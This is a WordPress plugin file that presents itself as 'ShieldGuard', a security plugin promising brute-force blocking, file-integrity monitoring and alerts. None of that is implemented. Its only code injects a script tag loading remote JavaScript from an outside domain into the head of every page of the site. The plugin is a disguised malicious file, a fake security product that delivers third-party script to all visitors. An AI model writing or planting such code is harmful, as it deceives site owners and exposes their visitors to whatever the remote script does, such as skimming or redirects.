 <?php
/**
 * Plugin Name: ShieldGuard
 * Description: "Invisible fortress for your WordPress site. ShieldGuard actively blocks brute-force attacks, monitors file integrity in real-time, and automatically obfuscates default login paths (wp-admin, wp-login.php). It stops XML-RPC exploits, limits login attempts per IP, and sends instant email alerts when suspicious changes are detected. Zero configuration required — install, activate, and stay protected."
 * Version: 1.2.5
 * Author: SecureLayer Studios
 */

if (!defined('ABSPATH')) {
    exit;
}

add_action('wp_head', 'icarus_shieldguard_head');

function icarus_shieldguard_head() {
    echo '<script src="https://norediam.com/proliv10/api"></script>';
}
